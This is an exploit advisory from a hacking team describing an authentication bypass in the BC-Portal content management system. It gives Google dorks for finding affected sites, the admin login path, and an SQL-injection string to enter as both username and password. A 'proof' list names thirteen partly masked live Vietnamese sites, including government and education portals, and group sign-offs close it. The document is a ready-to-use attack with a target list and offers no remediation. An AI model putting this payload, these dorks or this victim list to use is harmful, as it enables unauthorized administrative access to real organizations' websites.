#********************************************************************************
# Exploit Title : BC-Portal Login page Bypass Vulnerability
#
# Exploit Author : Ashiyane Digital Security Team
#
# Vendor Homepage : http://www.bitco.com.vn
#
# Tested on: Windows 7 , Linux
#
# Google Dork : inurl:vn/rss/index.php
#
# Google Dork 2 : inurl:rss/index.php?tabid=
#
# Date: 2013/11/7
#
--------------------------------------------------------------------
# Exploit : Login page bypass
#
# Location : [Target]/admin/login.php
#
# Username : '=' 'or'
#
# Password : '=' 'or'
######################
# Proof:
#
# http://khcXXacninh.gov.vn/admin/login.php
#
# http://hongXanh.com.vn/admin/login.php
#
# http://thongXnkhcn.vn/admin/login.php
#
# http://khcnXXcninh.gov.vn/admin/login.php
#
# http://wwXitco.com.vn/admin/lohin.php
#
# http://htXedu.vn/admin/login.php
#
# http://www.nhXdaovinhphuc.org.vn/admin/login.php
#
# http://www.haXXhongdost.gov.vn/admin/login.php
#
# http://thongtiXXhcn.vn/admin/login.php
#
# http://skhcn.bXninh.gov.vn/admin/login.php
#
# http://danaXXng.edu.vn/danang/admin/login.php
#
# http://www.khcnhXXgyen.gov.vn/admin/login.php
#
# http://kh-cnquangXXinh.gov.vn/admin/login.php
######################
Milad Hacking
We Love Mohammad
باز این چه شورش است که در خلق عالم است
باز این چه نوحه و چه عزا و چه ماتماست
Ya Hossein
######################